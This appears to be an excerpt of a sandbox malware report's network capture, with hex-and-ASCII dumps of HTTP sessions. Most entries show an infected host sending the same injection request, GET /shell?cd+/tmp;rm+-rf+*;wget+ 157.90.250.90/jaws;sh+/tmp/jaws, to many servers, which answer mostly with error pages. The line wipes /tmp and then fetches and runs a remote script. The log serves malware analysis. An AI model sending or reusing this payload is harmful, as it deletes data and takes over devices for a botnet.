22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 61 73 6b 69 6e 6d 65 64 69 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 38 38 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 61 73 6b 69 6e 6d 65 64 69 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 33 2e 38 38 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 61 73 6b 69 6e 6d 65 64 69 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 6d 61 64 5f 64 65 73 69 67 6e 65 72 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33
                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Taskin Media is under construction</title> <meta name="description" content="A digital, global entertainment company." /> <meta name="generator" content="Free UnderConstructionPage plugin for WordPress"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,900"> <link rel="stylesheet" href="http://www.taskinmedia.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.88" type="text/css"><link rel="stylesheet" href="http://www.taskinmedia.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.88" type="text/css"><link rel="stylesheet" href="http://www.taskinmedia.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3
                                                          Jan 2, 2024 06:25:11.255049944 CET1286INData Raw: 2e 38 38 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 61 73 6b 69 6e 6d 65 64 69 61 2e 63 6f 6d 2f 77 70 2d 63
                                                          Data Ascii: .88" type="text/css"><link rel="stylesheet" href="http://www.taskinmedia.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=3.88" type="text/css"><link rel="icon" sizes="128x128" href="http://www.taskinmedia.com
                                                          Jan 2, 2024 06:25:11.255055904 CET105INData Raw: 6f 6d 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 77 6f 72 64 70 72 65 73 73 20 66 61 2d 32 78 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 64 69 76
                                                          Data Ascii: om/wp-login.php"><i class="fa fa-wordpress fa-2x" aria-hidden="true"></i></a></div> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          481192.168.2.235319838.55.6.5880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:09.906086922 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          482192.168.2.234592423.216.114.4980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:10.067214966 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:10.379920006 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:10 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:10 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 36 61 38 32 64 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 31 30 26 23 34 36 3b 31 32 33 66 62 66 65 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;36a82d17&#46;1704173110&#46;123fbfe3</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          483192.168.2.234070295.101.194.5580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:10.079629898 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:10.327184916 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:25:10 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:10 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 34 34 62 63 37 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 31 30 26 23 34 36 3b 37 30 37 39 37 36 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;244bc717&#46;1704173110&#46;7079768</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          484192.168.2.2360092103.57.209.4580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:10.115853071 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:10.480473042 CET450INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:20:53 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          485192.168.2.2343668143.208.250.1180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:10.207226992 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:10.512859106 CET516INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html
                                                          Content-Length: 349
                                                          Connection: close
                                                          Date: Tue, 25 Apr 2023 23:44:48 GMT
                                                          Server: lighttpd/1.4.39
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          486192.168.2.233728423.33.51.1180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:10.230053902 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:10.554203033 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:10 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:10 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 63 34 64 32 35 30 31 26 23 34 36 3b 31 37 30 34 31 37 33 31 31 30 26 23 34 36 3b 31 39 30 32 32 36 33 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;cc4d2501&#46;1704173110&#46;1902263b</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          487192.168.2.2360636104.100.160.20380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:11.730540037 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:11.891784906 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:11 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:11 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 66 36 35 37 34 36 38 26 23 34 36 3b 31 37 30 34 31 37 33 31 31 31 26 23 34 36 3b 61 30 37 62 38 39 32 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ef657468&#46;1704173111&#46;a07b8921</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          488192.168.2.234108018.133.47.14280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:11.803956032 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:12.043049097 CET103INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: 400 Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          489192.168.2.233592446.101.163.10780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:11.820545912 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:12.077538013 CET500INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:22:40 GMT
                                                          Server: Apache/2.4.18 (Ubuntu)
                                                          Content-Length: 306
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 34 36 2e 31 30 31 2e 31 36 33 2e 31 30 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at 46.101.163.107 Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          490192.168.2.234244052.204.79.20280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:11.888955116 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:12.047091007 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:11 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          491192.168.2.2349116139.59.72.23080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:11.932825089 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:12.296967030 CET296INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:12 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 154
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          492192.168.2.234719618.65.143.9580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:12.172054052 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:12.455580950 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:25:12 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          493192.168.2.233817613.236.88.18080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:14.749773026 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          494192.168.2.23409725.217.213.3280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:14.761574030 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:15.718075037 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:17.637813091 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:21.541299105 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:29.220256090 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:44.578026056 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          495192.168.2.23453245.217.184.7880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:15.076575041 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:16.038038015 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
